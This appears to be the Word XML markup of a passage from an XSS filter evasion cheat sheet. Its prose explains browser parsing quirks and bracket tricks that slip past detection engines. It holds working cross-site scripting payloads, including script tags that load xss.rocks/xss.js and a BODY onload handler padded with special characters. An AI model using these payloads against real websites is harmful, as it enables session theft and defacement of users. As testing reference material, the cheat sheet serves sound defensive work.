                <v:shape id="Freeform 1279" o:spid="_x0000_s1159" style="position:absolute;left:1614;top:165;width:4374;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="437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gnocQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPMWvDMBCF90L/g7hCtkZOhjo4kU1IaeiSwWmXbod1&#10;kUysk5FUx/33UaHQ7Y737n3vds3sBjFRiL1nBatlAYK487pno+Dz4+15AyImZI2DZ1LwQxGa+vFh&#10;h5X2N25pOicjcgjHChXYlMZKythZchiXfiTO2sUHhymvwUgd8JbD3SDXRfEiHfacCRZHOljqrudv&#10;l7mnwMdj+3WKr3FjyJq2TNOs1OJp3m9BJJrTv/nv+l3n+uuyhN9v8giy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4J6HEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4353,182l21,182r-3,l,161r,-3l,21,21,,4353,r21,21l4374,161r-18,21l4353,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4353,348;21,348;18,348;0,327;0,324;0,187;21,166;4353,166;4374,187;4374,327;4356,348;4353,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1278" o:spid="_x0000_s1160" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:437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xwIsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3upGD9pGV5GiUBCKMT30OM2O&#10;yWJ2Ns1uNf33zkHobYb35r1vluvBt+pCfXSBDUzGGSjiKljHtYHPcvf8AiomZIttYDLwRxHWq8eH&#10;JeY2XLmgyzHVSkI45migSanLtY5VQx7jOHTEop1C7zHJ2tfa9niVcN/qaZbNtEfH0tBgR28NVefj&#10;rzew+eJi634+vg/FqXBl+ZrxfnY2ZvQ0bBagEg3p33y/freCP50LrnwjI+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CxwIs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&lt;SCRIPT/XSS</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId17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http://xss.rocks/xss.js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"&gt;&lt;/SCRIPT&gt;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GvdeMetni"/>
        <w:spacing w:before="101" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>Based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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>idea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above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>however,expanded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it,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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Rnake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fuzzer.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Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>letters,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>numbers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encapsulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>brackets,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>between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event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>handler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equals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sign,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>making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easier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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>blocks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Note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applies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grave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>accent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char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seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="8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92075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="262890"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1273" name="Group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262890"/>
                          <a:chOff x="1614" y="145"/>
                          <a:chExt cx="8700" cy="414"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1274" name="Freeform 1276"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="145"/>
                            <a:ext cx="8700" cy="414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558 145"/>
                              <a:gd name="T3" fmla="*/ 558 h 414"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 558 145"/>
                              <a:gd name="T7" fmla="*/ 558 h 414"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 558 145"/>
                              <a:gd name="T11" fmla="*/ 558 h 414"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 537 145"/>
                              <a:gd name="T15" fmla="*/ 537 h 414"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 534 145"/>
                              <a:gd name="T19" fmla="*/ 534 h 414"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 166 145"/>
                              <a:gd name="T23" fmla="*/ 166 h 414"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 145 145"/>
                              <a:gd name="T27" fmla="*/ 145 h 414"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 145 145"/>
                              <a:gd name="T31" fmla="*/ 145 h 414"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 166 145"/>
                              <a:gd name="T35" fmla="*/ 166 h 414"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 537 145"/>
                              <a:gd name="T39" fmla="*/ 537 h 414"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 558 145"/>
                              <a:gd name="T43" fmla="*/ 558 h 414"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 558 145"/>
                              <a:gd name="T47" fmla="*/ 558 h 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414">
                                <a:moveTo>
                                  <a:pt x="8679" y="413"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="389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392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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" name="Text Box 1275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45"/>
                            <a:ext cx="8700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&lt;BODY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onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;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74" o:spid="_x0000_s1161" style="position:absolute;margin-left:80.7pt;margin-top:7.25pt;width:435pt;height:20.7pt;z-index:-15707648;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,145" coordsize="8700,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">
                <v:shape id="Freeform 1276" o:spid="_x0000_s1162" style="position:absolute;left:1614;top:145;width:8700;height:414;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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WkhMIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPyWrDMBC9B/IPYgq9JXJdZ3OjmFBoSY5xArkO1sQ2&#10;tUbGUr38fVUo9DaPt84+G00jeupcbVnByzICQVxYXXOp4Hb9WGxBOI+ssbFMCiZykB3msz2m2g58&#10;oT73pQgh7FJUUHnfplK6oiKDbmlb4sA9bGfQB9iVUnc4hHDTyDiK1tJgzaGhwpbeKyq+8m+jIMlp&#10;sz2v8vr0eR+n3WsyuNYNSj0/jcc3EJ5G/y/+c590mB9vEvj9Jpw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laSEwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m8679,413l21,413r-3,l,392r,-3l,21,21,,8679,r21,21l8700,392r-18,21l8679,413xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,558;21,558;18,558;0,537;0,534;0,166;21,145;8679,145;8700,166;8700,537;8682,558;8679,558" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1275" o:spid="_x0000_s1163" type="#_x0000_t202" style="position:absolute;left:1614;top:145;width:8700;height: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3fvMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4q5sKak2zipQWhII0xoPHMTtJ&#10;FrOzaXbV9N+7BaG3ebzPyVaDbcWFem8cK3gZJyCIS6cN1wr2xefzKwgfkDW2jknBL3lYLR8fMky1&#10;u3JOl12oRQxhn6KCJoQuldKXDVn0Y9cRR65yvcUQYV9L3eM1httWTpJkJi0ajg0NdvTeUHnana2C&#10;9YHzD/OzPX7nVW6KYpHw1+yk1OhpWL+BCDSEf/HdvdFx/mQ+hb9v4gl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t37zEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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&lt;BODY</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="159" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>Yair</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Amit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>brought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my</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attention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slightly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>between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Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engines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allows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>just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slash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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tag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parameter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spaces.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could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useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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spaces.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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2561590" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1270" name="Group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1590" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="4034" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1271" name="Freeform 1273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4034" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5627 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4034"/>
                              <a:gd name="T2" fmla="+- 0 348 165"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4034"/>
                              <a:gd name="T6" fmla="+- 0 348 165"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4034"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4034"/>
                              <a:gd name="T14" fmla="+- 0 327 165"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4034"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4034"/>
                              <a:gd name="T22" fmla="+- 0 187 165"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4034"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5627 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4034"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5648 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4034"/>
                              <a:gd name="T34" fmla="+- 0 187 165"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5648 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4034"/>
                              <a:gd name="T38" fmla="+- 0 327 165"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5630 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4034"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5627 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4034"/>
                              <a:gd name="T46" fmla="+- 0 348 165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034" h="183">
                                <a:moveTo>
                                  <a:pt x="4013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4013" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4016" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4013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" name="Text Box 1272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403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&lt;SCRIPT/SRC="</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId18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http://xss.rocks/xss.js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71" o:spid="_x0000_s1164" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:201.7pt;height:9.15pt;z-index:-15707136;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="403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">
                <v:shape id="Freeform 1273" o:spid="_x0000_s1165" style="position:absolute;left:1614;top:165;width:4034;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="403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igeMEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgje1lQP7lIbRXyge9Oq96GZPrCZ&#10;1Cba+u83C8Le5uN7TrLsTS2e1LrKsoLJOAJBnFldcaHgct59foNwHlljbZkUvMjBcjH4SDDWtuMT&#10;PVNfiBDCLkYFpfdNLKXLSjLoxrYhDlxuW4M+wLaQusUuhJtaTqNoJg1WHBpKbGhdUnZLH0bBZnM5&#10;Xcl0q/txf7DebGd59INKjYb9ag7CU+//xW/3QYf5068J/H0TTp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ooHjBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m4013,183l21,183r-3,-1l,162r,-4l,22,21,,4013,r21,22l4034,162r-18,20l4013,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4013,348;21,348;18,347;0,327;0,323;0,187;21,165;4013,165;4034,187;4034,327;4016,347;4013,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1272" o:spid="_x0000_s1166" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:403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RHyMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y052BpdRaQFoSCN8eBxzI7J&#10;YnY2ZleN/75bKHibx/uc+bK3jbhR541jBeNRAoK4dNpwpWBffL19gPABWWPjmBQ8yMNyMXiZY6bd&#10;nXO67UIlYgj7DBXUIbSZlL6syaIfuZY4cifXWQwRdpXUHd5juG1kmiQTadFwbKixpXVN5Xl3tQpW&#10;B84/zWV7/MlPuSmKacLfk7NSr8N+NQMRqA9P8b97o+P89D2Fv2/iC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RHyM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&lt;SCRIPT/SRC="</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId19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http://xss.rocks/xss.js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"&gt;&lt;/SCRIPT&gt;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Extraneous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Brackets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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72" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Submitted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Franz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Sedlmaier,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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>defeat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engines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work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first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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pairs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open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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>brackets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doing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comparison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tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inside,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instead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algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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Boyer-Moore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looks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entire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>matches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open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket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associated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>de-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>obfuscation,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course).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double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>slash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>out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ending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>extraneous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket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suppress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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="11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115570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1921510" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1267" name="Group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1510" cy="116205"/>
                          <a:chOff x="1614" y="182"/>
                          <a:chExt cx="3026" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1268" name="Freeform 1270"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="181"/>
